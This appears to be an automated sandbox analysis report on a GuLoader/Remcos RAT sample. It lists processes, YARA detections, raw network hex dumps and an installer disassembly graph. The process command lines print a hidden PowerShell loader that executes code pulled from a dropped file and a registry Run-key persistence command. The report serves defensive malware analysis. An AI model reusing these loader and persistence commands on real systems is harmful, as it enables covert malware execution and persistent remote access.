                                    2024-09-25 14:01:29 UTC16384INData Raw: 3b 31 37 c6 e2 a2 72 a9 97 f4 75 62 84 b4 10 4b a9 21 19 8d b3 3d 35 c7 16 77 6b 31 1c 28 a3 33 9d 63 6d 47 4f 08 0e 58 e2 d9 17 e5 8d 33 b4 e9 06 b6 2d a1 76 2c 24 01 e0 9c 5a 63 6b d3 fd bd 38 c3 8f 77 2c 64 08 d9 11 b5 48 c4 55 b7 b5 4e 87 34 60 f5 d9 8e aa 10 ea 03 f9 0e 62 fb 17 c0 5f 0d aa 96 87 d9 88 93 0e 80 b2 8f 06 72 10 32 bc 17 e5 98 58 c7 34 c8 a1 14 0f 50 d6 52 d3 04 4b 24 6b 7b 29 b5 24 71 b9 bf f1 ae bf ae 10 33 57 6e 6e b0 35 b5 7b 4f 46 64 ff 54 7d 39 16 c6 99 a0 52 5e 99 0d 00 e8 ac c0 1b 03 5c 9e b6 d1 8d 3c 06 a4 1e 18 59 12 c5 06 7c 61 62 b9 a7 fa 61 c2 f5 ee 6b e6 f8 78 e5 03 45 16 85 75 b7 f4 8f a6 15 f8 cf 61 60 aa 11 81 ae 7c 99 5e c2 20 84 a3 50 88 c7 0a b9 70 56 37 db 15 19 7d 11 b3 92 8a 1e 94 32 1d 36 d8 7a e1 de 59 9f b2 e9
                                    Data Ascii: ;17rubK!=5wk1(3cmGOX3-v,$Zck8w,dHUN4`b_r2X4PRK$k{)$q3Wnn5{OFdT}9R^\<Y|abakxEua`|^ PpV7}26zY
                                    2024-09-25 14:01:29 UTC16384INData Raw: f1 1d d6 09 af 33 20 11 a2 a4 ba c9 9d e1 8a dc e1 e5 eb 26 72 cc b1 18 2a ae 06 c6 aa 65 0e 6c 25 2d 8d c7 54 35 7a 71 d4 3e 40 b5 99 5f 7d 14 07 01 db 59 fc 89 4e 8d 1f a7 86 af 4a 16 1d 66 1d 13 62 c1 6c d8 4d 4a ba 61 0a 15 36 30 1b f6 f6 fd f3 e5 30 f2 17 af 5d 60 a5 3b 12 4d 6c c1 39 cb b7 50 34 28 c1 aa af 15 de 74 41 80 eb 62 2c eb 70 f4 07 87 1e 88 87 b0 27 79 c0 90 87 b3 69 26 41 c4 46 42 1c ad ee 56 e2 2d f9 23 6b 17 c3 32 d3 fe 5f db ac 58 8e 70 5b b2 3e 98 a2 96 49 5d 19 61 a8 b2 66 f6 44 e3 32 c9 e8 4b bb b0 f1 d9 c1 a5 98 26 f9 95 bb 21 ca 60 69 d2 1a 0b 0c 98 ee 81 2d 52 c6 51 24 0f 8c bf 48 dc ef 38 04 70 80 a1 2a 44 a2 16 c1 e2 d0 af cd c3 3e 87 c1 12 29 66 e1 5d b4 a0 59 bd dc 0a a0 44 55 58 08 11 78 9c e5 51 ff 9f 6c 78 c7 90 4f 9a a4
                                    Data Ascii: 3 &r*el%-T5zq>@_}YNJfblMJa600]`;Ml9P4(tAb,p'yi&AFBV-#k2_Xp[>I]afD2K&!`i-RQ$H8p*D>)f]YDUXxQlxO
                                    2024-09-25 14:01:29 UTC16384INData Raw: 95 40 21 b1 b0 70 39 72 f3 76 7a 8e c3 2d 15 58 2c 39 dd f9 5d 4f 8d 13 2f 42 e9 e7 1b 0c b8 5a bf 96 cf c2 a4 95 86 2e 9b f0 bf 15 d3 87 ec bd 00 37 33 49 fb 1a bc 43 bb 2c a6 48 37 2b 40 17 7c 72 fc 17 f9 2c 5b 61 f2 f4 44 e9 84 5e ec de 2d 5d 90 8e b9 c6 55 d0 7e fc 5a 11 9a 11 4d df d4 6e 73 89 bb 26 e9 09 cc a3 c9 8d 6b 6f 2f 37 e6 7d c3 80 68 aa 06 76 3a f5 df 38 f5 94 c1 34 3d f8 ca 8f 29 f0 7b 1b c8 b6 67 50 3b ee 15 78 9f e7 2a 98 ab 09 8e 60 d6 4a b1 2c 1a 04 63 5a bf 5b 29 f6 25 9a 3e f6 a7 20 9e 62 74 93 da 80 b0 71 4c 9d 34 95 5c b5 65 d9 e6 2a 66 3f c2 27 cc b7 1e ea ce 19 55 d5 37 f6 94 08 80 6e 7b a3 d5 7a 4b 55 70 a9 91 69 65 6d c7 98 fd b2 ee fa 8e 61 d3 42 bf cb b3 62 a9 ef c3 dc 13 d5 34 1e 66 a2 d2 66 96 e8 7d 94 91 64 5d d0 a5 9c be
                                    Data Ascii: @!p9rvz-X,9]O/BZ.73IC,H7+@|r,[aD^-]U~ZMns&ko/7}hv:84=){gP;x*`J,cZ[)%> btqL4\e*f?'U7n{zKUpiemaBb4ff}d]
                                    2024-09-25 14:01:29 UTC16384INData Raw: ca 72 db 98 ad 06 8b 68 7d e9 e4 c7 81 6d 46 78 2f f6 ec 09 65 95 4f d3 d1 36 4e 2b ba 33 12 f1 84 f7 1f a6 8d 06 5c 67 da 60 b3 42 3e ea 0c 32 d6 9f de 3a 45 04 ec 5c 3c 64 97 89 8e 0e d5 69 ab 6c 1d f4 63 c1 df b8 e9 47 24 00 f2 48 04 15 86 86 46 ed c5 2d 09 6c 8e 8c 3b 26 e8 b0 19 f5 fd b5 d8 9c 0e f3 e0 2a 1f 5a 36 62 24 ac fc 1d 11 35 2b 60 0d f3 22 d5 e8 42 54 30 13 ac 4e fa e9 e6 47 32 ab 94 0a 26 78 75 da e2 77 81 db b0 20 76 f6 4b dc b9 3e df ab 92 72 a2 27 1a 34 2c 57 e7 d3 7c 5e 46 5d de 4d 55 fb b6 a0 05 8b f1 9a 45 30 02 6a 87 f6 b8 bc 56 d7 7d 6a 11 ac 34 23 e4 ef c9 d0 96 4a 03 46 3a 76 fb 8f 86 66 d0 01 a5 67 85 f6 fb f2 41 ec 10 65 0d 41 0d 27 6a 58 08 ab f1 f6 c0 51 6d d1 62 a1 97 da 13 1b fd 34 05 53 ee f9 50 09 c2 97 20 8d 4a 5b 71 cd
                                    Data Ascii: rh}mFx/eO6N+3\g`B>2:E\<dilcG$HF-l;&*Z6b$5+`"BT0NG2&xuw vK>r'4,W|^F]MUE0jV}j4#JF:vfgAeA'jXQmb4SP J[q


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:09:59:00
                                    Start date:25/09/2024
                                    Path:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\SDWLLRJcsY.exe"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:09:59:01
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
                                    Imagebase:0x7d0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.3181422671.000000000B5DE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:09:59:01
                                    Start date:25/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:10:01:16
                                    Start date:25/09/2024
                                    Path:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\Conspect124.exe"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 13%, ReversingLabs
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:8
                                    Start time:10:01:25
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
                                    Imagebase:0x800000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:9
                                    Start time:10:01:25
                                    Start date:25/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:10
                                    Start time:10:01:25
                                    Start date:25/09/2024
                                    Path:C:\Windows\SysWOW64\reg.exe
                                    Wow64 process (32bit):true
                                    Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"
                                    Imagebase:0xb10000
                                    File size:59'392 bytes
                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:11
                                    Start time:10:01:31
                                    Start date:25/09/2024
                                    Path:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:12
                                    Start time:10:01:31
                                    Start date:25/09/2024
                                    Path:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:13
                                    Start time:10:01:32
                                    Start date:25/09/2024
                                    Path:C:\Users\user\AppData\Local\Temp\Conspect124.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb"
                                    Imagebase:0x400000
                                    File size:995'120 bytes
                                    MD5 hash:7BD1CCE43F6B48C8DDD492E5711FD17F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:24.7%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:21%
                                      Total number of Nodes:1353
                                      Total number of Limit Nodes:41
                                      execution_graph 3249 4015c1 3250 402c37 17 API calls 3249->3250 3251 4015c8 3250->3251 3268 405bc8 CharNextW CharNextW 3251->3268 3253 401631 3255 401663 3253->3255 3256 401636 3253->3256 3254 405b4a CharNextW 3262 4015d1 3254->3262 3258 401423 24 API calls 3255->3258 3282 401423 3256->3282 3266 40165b 3258->3266 3262->3253 3262->3254 3265 401617 GetFileAttributesW 3262->3265 3274 405819 3262->3274 3277 40577f CreateDirectoryW 3262->3277 3286 4057fc CreateDirectoryW 3262->3286 3264 40164a SetCurrentDirectoryW 3264->3266 3265->3262 3269 405be5 3268->3269 3273 405bf7 3268->3273 3271 405bf2 CharNextW 3269->3271 3269->3273 3270 405c1b 3270->3262 3271->3270 3272 405b4a CharNextW 3272->3273 3273->3270 3273->3272 3289 406626 GetModuleHandleA 3274->3289 3278 4057d0 GetLastError 3277->3278 3279 4057cc 3277->3279 3278->3279 3280 4057df SetFileSecurityW 3278->3280 3279->3262 3280->3279 3281 4057f5 GetLastError 3280->3281 3281->3279 3283 4052b0 24 API calls 3282->3283 3284 401431 3283->3284 3285 40624c lstrcpynW 3284->3285 3285->3264 3287 405810 GetLastError 3286->3287 3288 40580c 3286->3288 3287->3288 3288->3262 3290 406642 3289->3290 3291 40664c GetProcAddress 3289->3291 3295 4065b6 GetSystemDirectoryW 3290->3295 3292 405820 3291->3292 3292->3262 3294 406648 3294->3291 3294->3292 3296 4065d8 wsprintfW LoadLibraryExW 3295->3296 3296->3294 3298 401941 3299 401943 3298->3299 3300 402c37 17 API calls 3299->3300 3301 401948 3300->3301 3304 40595a 3301->3304 3343 405c25 3304->3343 3307 405982 DeleteFileW 3312 401951 3307->3312 3308 405999 3310 405ab9 3308->3310 3357 40624c lstrcpynW 3308->3357 3310->3312 3375 40658f FindFirstFileW 3310->3375 3311 4059bf 3313 4059d2 3311->3313 3314 4059c5 lstrcatW 3311->3314 3358 405b69 lstrlenW 3313->3358 3315 4059d8 3314->3315 3318 4059e8 lstrcatW 3315->3318 3320 4059f3 lstrlenW FindFirstFileW 3315->3320 3318->3320 3320->3310 3328 405a15 3320->3328 3321 405ae2 3378 405b1d lstrlenW CharPrevW 3321->3378 3324 405a9c FindNextFileW 3324->3328 3329 405ab2 FindClose 3324->3329 3325 405912 5 API calls 3327 405af4 3325->3327 3330 405af8 3327->3330 3331 405b0e 3327->3331 3328->3324 3338 405a5d 3328->3338 3362 40624c lstrcpynW 3328->3362 3329->3310 3330->3312 3334 4052b0 24 API calls 3330->3334 3333 4052b0 24 API calls 3331->3333 3333->3312 3336 405b05 3334->3336 3335 40595a 60 API calls 3335->3338 3337 406012 36 API calls 3336->3337 3340 405b0c 3337->3340 3338->3324 3338->3335 3339 4052b0 24 API calls 3338->3339 3341 4052b0 24 API calls 3338->3341 3363 405912 3338->3363 3371 406012 MoveFileExW 3338->3371 3339->3324 3340->3312 3341->3338 3381 40624c lstrcpynW 3343->3381 3345 405c36 3346 405bc8 4 API calls 3345->3346 3347 405c3c 3346->3347 3348 40597a 3347->3348 3349 4064e0 5 API calls 3347->3349 3348->3307 3348->3308 3355 405c4c 3349->3355 3350 405c7d lstrlenW 3351 405c88 3350->3351 3350->3355 3353 405b1d 3 API calls 3351->3353 3352 40658f 2 API calls 3352->3355 3354 405c8d GetFileAttributesW 3353->3354 3354->3348 3355->3348 3355->3350 3355->3352 3356 405b69 2 API calls 3355->3356 3356->3350 3357->3311 3359 405b77 3358->3359 3360 405b89 3359->3360 3361 405b7d CharPrevW 3359->3361 3360->3315 3361->3359 3361->3360 3362->3328 3382 405d19 GetFileAttributesW 3363->3382 3366 405935 DeleteFileW 3369 40593b 3366->3369 3367 40592d RemoveDirectoryW 3367->3369 3368 40593f 3368->3338 3369->3368 3370 40594b SetFileAttributesW 3369->3370 3370->3368 3372 406033 3371->3372 3373 406026 3371->3373 3372->3338 3385 405e98 3373->3385 3376 405ade 3375->3376 3377 4065a5 FindClose 3375->3377 3376->3312 3376->3321 3377->3376 3379 405ae8 3378->3379 3380 405b39 lstrcatW 3378->3380 3379->3325 3380->3379 3381->3345 3383 40591e 3382->3383 3384 405d2b SetFileAttributesW 3382->3384 3383->3366 3383->3367 3383->3368 3384->3383 3386 405ec8 3385->3386 3387 405eee GetShortPathNameW 3385->3387 3412 405d3e GetFileAttributesW CreateFileW 3386->3412 3389 405f03 3387->3389 3390 40600d 3387->3390 3389->3390 3392 405f0b wsprintfA 3389->3392 3390->3372 3391 405ed2 CloseHandle GetShortPathNameW 3391->3390 3393 405ee6 3391->3393 3394 40626e 17 API calls 3392->3394 3393->3387 3393->3390 3395 405f33 3394->3395 3413 405d3e GetFileAttributesW CreateFileW 3395->3413 3397 405f40 3397->3390 3398 405f4f GetFileSize GlobalAlloc 3397->3398 3399 405f71 3398->3399 3400 406006 CloseHandle 3398->3400 3414 405dc1 ReadFile 3399->3414 3400->3390 3405 405f90 lstrcpyA 3408 405fb2 3405->3408 3406 405fa4 3407 405ca3 4 API calls 3406->3407 3407->3408 3409 405fe9 SetFilePointer 3408->3409 3421 405df0 WriteFile 3409->3421 3412->3391 3413->3397 3415 405ddf 3414->3415 3415->3400 3416 405ca3 lstrlenA 3415->3416 3417 405ce4 lstrlenA 3416->3417 3418 405cec 3417->3418 3419 405cbd lstrcmpiA 3417->3419 3418->3405 3418->3406 3419->3418 3420 405cdb CharNextA 3419->3420 3420->3417 3422 405e0e GlobalFree 3421->3422 3422->3400 3433 401e43 3441 402c15 3433->3441 3435 401e49 3436 402c15 17 API calls 3435->3436 3437 401e55 3436->3437 3438 401e61 ShowWindow 3437->3438 3439 401e6c EnableWindow 3437->3439 3440 402abf 3438->3440 3439->3440 3442 40626e 17 API calls 3441->3442 3443 402c2a 3442->3443 3443->3435 4106 402644 4107 402c15 17 API calls 4106->4107 4114 402653 4107->4114 4108 402790 4109 40269d ReadFile 4109->4108 4109->4114 4110 405dc1 ReadFile 4110->4114 4111 402792 4128 406193 wsprintfW 4111->4128 4112 4026dd MultiByteToWideChar 4112->4114 4114->4108 4114->4109 4114->4110 4114->4111 4114->4112 4116 402703 SetFilePointer MultiByteToWideChar 4114->4116 4118 4027a3 4114->4118 4119 405e1f SetFilePointer 4114->4119 4116->4114 4117 4027c4 SetFilePointer 4117->4108 4118->4108 4118->4117 4120 405e3b 4119->4120 4125 405e57 4119->4125 4121 405dc1 ReadFile 4120->4121 4122 405e47 4121->4122 4123 405e60 SetFilePointer 4122->4123 4124 405e88 SetFilePointer 4122->4124 4122->4125 4123->4124 4126 405e6b 4123->4126 4124->4125 4125->4114 4127 405df0 WriteFile 4126->4127 4127->4125 4128->4108 3458 402348 3459 402c37 17 API calls 3458->3459 3460 402357 3459->3460 3461 402c37 17 API calls 3460->3461 3462 402360 3461->3462 3463 402c37 17 API calls 3462->3463 3464 40236a GetPrivateProfileStringW 3463->3464 4139 4016cc 4140 402c37 17 API calls 4139->4140 4141 4016d2 GetFullPathNameW 4140->4141 4142 40170e 4141->4142 4143 4016ec 4141->4143 4144 401723 GetShortPathNameW 4142->4144 4145 402abf 4142->4145 4143->4142 4146 40658f 2 API calls 4143->4146 4144->4145 4147 4016fe 4146->4147 4147->4142 4149 40624c lstrcpynW 4147->4149 4149->4142 4150 401b4d 4151 402c37 17 API calls 4150->4151 4152 401b54 4151->4152 4153 402c15 17 API calls 4152->4153 4154 401b5d wsprintfW 4153->4154 4155 402abf 4154->4155 4156 401f52 4157 402c37 17 API calls 4156->4157 4158 401f59 4157->4158 4159 40658f 2 API calls 4158->4159 4160 401f5f 4159->4160 4162 401f70 4160->4162 4163 406193 wsprintfW 4160->4163 4163->4162 4164 402253 4165 402c37 17 API calls 4164->4165 4166 402259 4165->4166 4167 402c37 17 API calls 4166->4167 4168 402262 4167->4168 4169 402c37 17 API calls 4168->4169 4170 40226b 4169->4170 4171 40658f 2 API calls 4170->4171 4172 402274 4171->4172 4173 402285 lstrlenW lstrlenW 4172->4173 4177 402278 4172->4177 4175 4052b0 24 API calls 4173->4175 4174 4052b0 24 API calls 4178 402280 4174->4178 4176 4022c3 SHFileOperationW 4175->4176 4176->4177 4176->4178 4177->4174 4177->4178 4179 401956 4180 402c37 17 API calls 4179->4180 4181 40195d lstrlenW 4180->4181 4182 40258c 4181->4182 4183 406956 4184 4067da 4183->4184 4185 407145 4184->4185 4186 406864 GlobalAlloc 4184->4186 4187 40685b GlobalFree 4184->4187 4188 4068d2 GlobalFree 4184->4188 4189 4068db GlobalAlloc 4184->4189 4186->4184 4186->4185 4187->4186 4188->4189 4189->4184 4189->4185 4190 401d57 GetDlgItem GetClientRect 4191 402c37 17 API calls 4190->4191 4192 401d89 LoadImageW SendMessageW 4191->4192 4193 401da7 DeleteObject 4192->4193 4194 402abf 4192->4194 4193->4194 4195 402dd7 4196 402e02 4195->4196 4197 402de9 SetTimer 4195->4197 4198 402e57 4196->4198 4199 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4196->4199 4197->4196 4199->4198 4200 4014d7 4201 402c15 17 API calls 4200->4201 4202 4014dd Sleep 4201->4202 4204 402abf 4202->4204 4205 4022d7 4206 4022de 4205->4206 4209 4022f1 4205->4209 4207 40626e 17 API calls 4206->4207 4208 4022eb 4207->4208 4210 4058ae MessageBoxIndirectW 4208->4210 4210->4209 3813 40175c 3814 402c37 17 API calls 3813->3814 3815 401763 3814->3815 3819 405d6d 3815->3819 3817 40176a 3818 405d6d 2 API calls 3817->3818 3818->3817 3820 405d7a GetTickCount GetTempFileNameW 3819->3820 3821 405db0 3820->3821 3822 405db4 3820->3822 3821->3820 3821->3822 3822->3817 4053 4023de 4054 402c37 17 API calls 4053->4054 4055 4023f0 4054->4055 4056 402c37 17 API calls 4055->4056 4057 4023fa 4056->4057 4070 402cc7 4057->4070 4060 402885 4061 402432 4063 40243e 4061->4063 4065 402c15 17 API calls 4061->4065 4062 402c37 17 API calls 4064 402428 lstrlenW 4062->4064 4066 40245d RegSetValueExW 4063->4066 4067 4030fa 35 API calls 4063->4067 4064->4061 4065->4063 4068 402473 RegCloseKey 4066->4068 4067->4066 4068->4060 4071 402ce2 4070->4071 4074 4060e7 4071->4074 4075 4060f6 4074->4075 4076 406101 RegCreateKeyExW 4075->4076 4077 40240a 4075->4077 4076->4077 4077->4060 4077->4061 4077->4062 3423 402862 3424 402c37 17 API calls 3423->3424 3425 402869 FindFirstFileW 3424->3425 3426 402891 3425->3426 3427 40287c 3425->3427 3431 406193 wsprintfW 3426->3431 3429 40289a 3432 40624c lstrcpynW 3429->3432 3431->3429 3432->3427 4218 401563 4219 402a65 4218->4219 4222 406193 wsprintfW 4219->4222 4221 402a6a 4222->4221 4223 401968 4224 402c15 17 API calls 4223->4224 4225 40196f 4224->4225 4226 402c15 17 API calls 4225->4226 4227 40197c 4226->4227 4228 402c37 17 API calls 4227->4228 4229 401993 lstrlenW 4228->4229 4230 4019a4 4229->4230 4231 4019e5 4230->4231 4235 40624c lstrcpynW 4230->4235 4233 4019d5 4233->4231 4234 4019da lstrlenW 4233->4234 4234->4231 4235->4233 4236 404669 4237 404679 4236->4237 4238 40469f 4236->4238 4239 4041e1 18 API calls 4237->4239 4240 404248 8 API calls 4238->4240 4241 404686 SetDlgItemTextW 4239->4241 4242 4046ab 4240->4242 4241->4238 4243 4027e9 4244 4027f0 4243->4244 4245 402a6a 4243->4245 4246 402c15 17 API calls 4244->4246 4247 4027f7 4246->4247 4248 402806 SetFilePointer 4247->4248 4248->4245 4249 402816 4248->4249 4251 406193 wsprintfW 4249->4251 4251->4245 4252 40166a 4253 402c37 17 API calls 4252->4253 4254 401670 4253->4254 4255 40658f 2 API calls 4254->4255 4256 401676 4255->4256 4257 401ced 4258 402c15 17 API calls 4257->4258 4259 401cf3 IsWindow 4258->4259 4260 401a20 4259->4260 3606 4053ef 3607 405410 GetDlgItem GetDlgItem GetDlgItem 3606->3607 3608 405599 3606->3608 3651 404216 SendMessageW 3607->3651 3610 4055a2 GetDlgItem CreateThread CloseHandle 3608->3610 3611 4055ca 3608->3611 3610->3611 3654 405383 OleInitialize 3610->3654 3613 4055f5 3611->3613 3614 4055e1 ShowWindow ShowWindow 3611->3614 3615 40561a 3611->3615 3612 405480 3617 405487 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3612->3617 3616 405655 3613->3616 3619 405609 3613->3619 3620 40562f ShowWindow 3613->3620 3653 404216 SendMessageW 3614->3653 3621 404248 8 API calls 3615->3621 3616->3615 3626 405663 SendMessageW 3616->3626 3624 4054f5 3617->3624 3625 4054d9 SendMessageW SendMessageW 3617->3625 3627 4041ba SendMessageW 3619->3627 3622 405641 3620->3622 3623 40564f 3620->3623 3632 405628 3621->3632 3628 4052b0 24 API calls 3622->3628 3629 4041ba SendMessageW 3623->3629 3630 405508 3624->3630 3631 4054fa SendMessageW 3624->3631 3625->3624 3626->3632 3633 40567c CreatePopupMenu 3626->3633 3627->3615 3628->3623 3629->3616 3635 4041e1 18 API calls 3630->3635 3631->3630 3634 40626e 17 API calls 3633->3634 3636 40568c AppendMenuW 3634->3636 3637 405518 3635->3637 3638 4056a9 GetWindowRect 3636->3638 3639 4056bc TrackPopupMenu 3636->3639 3640 405521 ShowWindow 3637->3640 3641 405555 GetDlgItem SendMessageW 3637->3641 3638->3639 3639->3632 3643 4056d7 3639->3643 3644 405544 3640->3644 3645 405537 ShowWindow 3640->3645 3641->3632 3642 40557c SendMessageW SendMessageW 3641->3642 3642->3632 3646 4056f3 SendMessageW 3643->3646 3652 404216 SendMessageW 3644->3652 3645->3644 3646->3646 3647 405710 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3646->3647 3649 405735 SendMessageW 3647->3649 3649->3649 3650 40575e GlobalUnlock SetClipboardData CloseClipboard 3649->3650 3650->3632 3651->3612 3652->3641 3653->3613 3655 40422d SendMessageW 3654->3655 3658 4053a6 3655->3658 3656 4053cd 3657 40422d SendMessageW 3656->3657 3659 4053df CoUninitialize 3657->3659 3658->3656 3660 401389 2 API calls 3658->3660 3660->3658 3661 40176f 3662 402c37 17 API calls 3661->3662 3663 401776 3662->3663 3664 401796 3663->3664 3665 40179e 3663->3665 3721 40624c lstrcpynW 3664->3721 3722 40624c lstrcpynW 3665->3722 3668 40179c 3672 4064e0 5 API calls 3668->3672 3669 4017a9 3670 405b1d 3 API calls 3669->3670 3671 4017af lstrcatW 3670->3671 3671->3668 3677 4017bb 3672->3677 3673 40658f 2 API calls 3673->3677 3674 405d19 2 API calls 3674->3677 3676 4017cd CompareFileTime 3676->3677 3677->3673 3677->3674 3677->3676 3678 40188d 3677->3678 3681 40624c lstrcpynW 3677->3681 3688 40626e 17 API calls 3677->3688 3697 401864 3677->3697 3699 405d3e GetFileAttributesW CreateFileW 3677->3699 3723 4058ae 3677->3723 3679 4052b0 24 API calls 3678->3679 3682 401897 3679->3682 3680 4052b0 24 API calls 3687 401879 3680->3687 3681->3677 3700 4030fa 3682->3700 3685 4018be SetFileTime 3686 4018d0 CloseHandle 3685->3686 3686->3687 3689 4018e1 3686->3689 3688->3677 3690 4018e6 3689->3690 3691 4018f9 3689->3691 3692 40626e 17 API calls 3690->3692 3693 40626e 17 API calls 3691->3693 3695 4018ee lstrcatW 3692->3695 3696 401901 3693->3696 3695->3696 3698 4058ae MessageBoxIndirectW 3696->3698 3697->3680 3697->3687 3698->3687 3699->3677 3701 403113 3700->3701 3702 40313e 3701->3702 3737 4032f5 SetFilePointer 3701->3737 3727 4032df 3702->3727 3706 40315b GetTickCount 3717 40316e 3706->3717 3707 40327f 3708 403283 3707->3708 3712 40329b 3707->3712 3710 4032df ReadFile 3708->3710 3709 4018aa 3709->3685 3709->3686 3710->3709 3711 4032df ReadFile 3711->3712 3712->3709 3712->3711 3714 405df0 WriteFile 3712->3714 3713 4032df ReadFile 3713->3717 3714->3712 3716 4031d4 GetTickCount 3716->3717 3717->3709 3717->3713 3717->3716 3718 4031fd MulDiv wsprintfW 3717->3718 3720 405df0 WriteFile 3717->3720 3730 4067a7 3717->3730 3719 4052b0 24 API calls 3718->3719 3719->3717 3720->3717 3721->3668 3722->3669 3724 4058c3 3723->3724 3725 40590f 3724->3725 3726 4058d7 MessageBoxIndirectW 3724->3726 3725->3677 